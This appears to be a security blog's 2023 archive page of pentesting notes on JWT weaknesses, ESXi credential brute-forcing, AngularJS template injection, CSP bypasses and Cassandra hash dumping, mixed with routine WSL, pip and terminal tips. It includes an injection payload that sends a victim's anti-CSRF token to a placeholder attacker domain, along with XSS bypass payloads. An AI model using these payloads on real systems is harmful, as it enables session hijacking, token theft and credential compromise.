Skip to main content

Posts

Showing posts from 2023

Attacking JSON Web Tokens - JWT Pentesting

  sign an unsigned token, the process is as follows.  unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)  signature_encoded = encodeBase64(HMAC-SHA256("secret", unsignedToken))  jwt_token = encodeBase64(header) + "." + encodeBase64(payload) + "." + signature_encoded JWT is not vulnerable to CSRF (except when JWT is put in a cookie) Session theft through an XSS attack is possible when JWT is used Improper token storage (HTML5 storage/cookie) Sometimes the key is weak and can be brute-forced Faulty token expiration JWT can be used as Bearer token in a custom authorization header JWT is being used for stateless applications. JWT usage results in no server-side storage and database-based session management. All info is put inside a signed JWT token. - Only relying on the secret key - Logging out or invalidating specific users is not possible due to the above stateless approach. The same signing key is used for everyone. #HMAC S

Make Permanent Changes on WSL - /etc/resolv.conf

  sudo bash #add an entry in resolv.conf - update ip address as required echo "nameserver 8.8.8.8" >> /etc/resolv.conf #Make the file Immutable; if you want to update the file again later - run chattr -i /etc/resolv.conf to make it mutable again chattr +i /etc/resolv.conf # add an entry in wsl.conf sudo nano /etc/wsl.conf #Add the below lines [boot] systemd=true [network] generateResolvConf = false exit wsl --shutdown wsl #You should observe the changes are now permanent.

Using Python Virtual Environment

  # Install venv sudo apt install python3-venv #Create a new virual env python3 -m venv .venv/project_name # Get into virtual env - now you are in vir env source project_name/bin/activate #deactivate vir env deactivate #install a package python -m pip install requests pip install --upgrade --force-reinstall --ignore-installed -r requirements.txt \ > --extra-index-url file:///$PWD/lib #list available packages python -m pip freeze Resolving externally-managed-environment × This environment is externally managed - Create a virtual env or - install the packages syste m wide --break-system-packages pip install requests --break-system-packages

VMware ESXi Pentesting

  Reference Links 1. Soap API Guide 2. Ports and Services 3. Vcenter Security Guide Port 902 - VMWare Authentication Daemon - It is possible to brute force credentials on Port 902 using metasploit - 902 Port is available only when remote access is required. - Uses Windows Domain Login Creds - unless local access is set. - Generally, this kind of service is not logged - Recommended to brute force 902 port instead of RDP or ssh when. #Bruteforcing msfconsole use auxiliary/scanner/vmware/vmauthd_login #Access nc 10.10.10.10 902 USER root PASS toor

Resolving Python Pip Issues

  Automatically Create requirements.txt # install pip3 install pipreqs # Run in current directory python3 -m pipreqs.pipreqs . python2: pip install pipreqs python -m pipreqs.pipreqs . sudo apt-get remove python3-pip go to https://bootstrap.pypa.io/pip/ and download appropriate version #Install get-pip.py python3 get-pip.py Installing pwntools apt-get update apt-get install -y python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade pwntools

OpenVPN Client Issues

Erros:  OpenSSL: error:0A00018E:SSL routines::ca md too wea AUTH_FAILED,Data channel cipher negotiation failed (no shared cipher) DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers Update the config File as below. client dev tun allow-compression yes proto udp remote edge-us-fort-1.hackthebox.eu 1337 resolv-retry infinite nobind persist-key persist-tun remote-cert-tls server comp-lzo verb 3 data-ciphers-fallback AES-128-CBC auth SHA256 key-direction 1 tls-cert-profile insecure    

Pentesting AngularJS

Template Injection & Scope Hacking - Attack is limited to $scope functions and variables - Check if an application is using angular JS & Vulnerable to Template Injection or not. - Check the source code for `angular` keyword - open dev tools --> Console --> `angular.element($0).scope()` - This lists the scope - all the elements in the page - Check the soure code of functions to see what its doing - Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ; - Check for any injectable variables (Ex: some empty or dynamic content ) - Call the function - Send the below payload as input and see the connection going out - which has the victim's anti-csrf token -` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}` - input `{{4-1}}` --> if the output is 3 --> VULNERABLE - use this any input or search parametes. Going Beyond the Scope - XSS via Templat

Bypassing Content-Security-Policy

- CSP can be implemented via - Response header - Meta tag <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"> Bypass CSP via ajax.googleapis.com via Flash file via Polyglot file via AngularJS Bypass CSP via ajax.googleapis.com Check `Content-Security-Policy: script-src 'self' ajax.googleapis.com` - here script-src 'self' ajax.googleapis.com means -> it allows only the same domains scripts + ajax.googleapis.com scripts <div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angular/1.6.6/angular.min.js></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script> Bypass CSP via Flash File Works if the CSP is `Content-Security-Policy: script-src 'self'`; when the only restriction is script- we can bypass it using Flash File <object t

Simple Web Pentest Checklist

  - Fuzz the Application - Use testssl.sh to look for SSL issues and Vulnerabilities - Run Nikto & Nuclei, Dirsearch.py, BlackWidow on the target - Check if the appliation using AngularJS - Look for the version and its vulnerabilities - Check for Content Security Policy - Check for Cross Origin Resource Sharing - Change the Origin header domain and see if its reflected on the response or not - Origin: somerandomdomain.com - Add Multiple Origin Headers and see the response - Add Port, Special chars, null strings to it and observe the changes - Look for Host Header Injection Attacks - Add extra host header - Add X-Forwarded-For: somerandomdomain.com header and see if its being reflected or not - Look for Cached responses (Filter tfor the keyword "Cache" in Burp HTTP history), Web Cache Poisoning might be possible possible - Check if httonly and Secure flags are added in the cookie or not & HSTS - Check if .git exists and see if you can use https://git

Installing Checksec

$ CHECKSEC_STABLE=$(curl -s https://api.github.com/repos/slimm609/checksec.sh/releases/latest | awk '/"tag_name"/{ print $2 }' | sed 's/"//g;s/,//') $ curl -s -o checksec https://raw.githubusercontent.com/slimm609/checksec.sh/${CHECKSEC_STABLE}/checksec $ curl -s -o checksec.sig https://raw.githubusercontent.com/slimm609/checksec.sh/${CHECKSEC_STABLE}/checksec.sig $ curl -s -o checksec.pub https://raw.githubusercontent.com/slimm609/checksec.sh/${CHECKSEC_STABLE}/checksec.pub $ openssl dgst -sha256 -verify checksec.pub -signature checksec.sig checksec Verified OK $ chmod u+x checksec checksec --file=vuln checksec --file=/bin/sh

Casandra DB Pentest - Port 9042

  Install Cqlsh sudo apt update sudo apt install openjdk-8-jdk sudo apt install apt-transport-https wget -q -O - https :// www.apache.org / dist / cassandra / KEYS | sudo apt-key add - sudo sh -c 'echo "deb http://www.apache.org/dist/cassandra/debian 311x main" > /etc/apt/sources.list.d/cassandra.list' sudo apt update sudo apt install cassandra Commands to Get Data sudo cqlsh 10.10.10.10 #List DB SELECT keyspace_name FROM system.schema_keyspaces ; SELECT * FROM system.schema_keyspaces ; #select DB use DB_NAME ; use system_auth ; #list tables from databsae/keyspace system SELECT columnfamily_name FROM system.schema_columnfamilies WHERE keyspace_name ='system'; #list tables and columns SELECT column_name, type, validator FROM system.schema_columns WHERE keyspace_name = 'system_auth' AND columnfamily_name = 'roles' ; #list DB hashes SELECT * from system_auth.roles Ref: Configuring firewall port access | Apache Cassandra 3.

Terminal Color Coding - tput

Value Color 0 Black 1 Red 2 Green 3 Yellow 4 Blue 5 Magenta 6 Cyan 7 White 8 Not used 9 Reset to default color Example green=`tput setaf 2` red=`tput setaf 2` reset=`tput sgr0` echo -e "\n${green}########## Display Text in GREEN Color ########## ${reset} \n" echo -e "\n${red}########## Display Text in RED Color ########## ${reset} \n" Customize Bash Prompt in Linux #Set it permnently sudo nano ~/.bashrc #at the end of the file, paste the below and save it PS1="\e[1;34m[\u - \W]\$ \e[0m" #u = username; \H = hostname; export PS1="\u# " #Hide everything export PS1="\W > " #Show Username with last Directory in color export PS1="\e[0;32m[\u - \W]\$ \e[0m" export PS1="\e[1;34m[\u - \W]\$ \e[0m" • \e[ – Begin color changes • 0;32m – Specify the color code • [\u@\h \W]\$ – This is the code for your normal BASH prompt (username@hostname Workingdirectory $) • \e[0m – Exit color-change mode The first number in the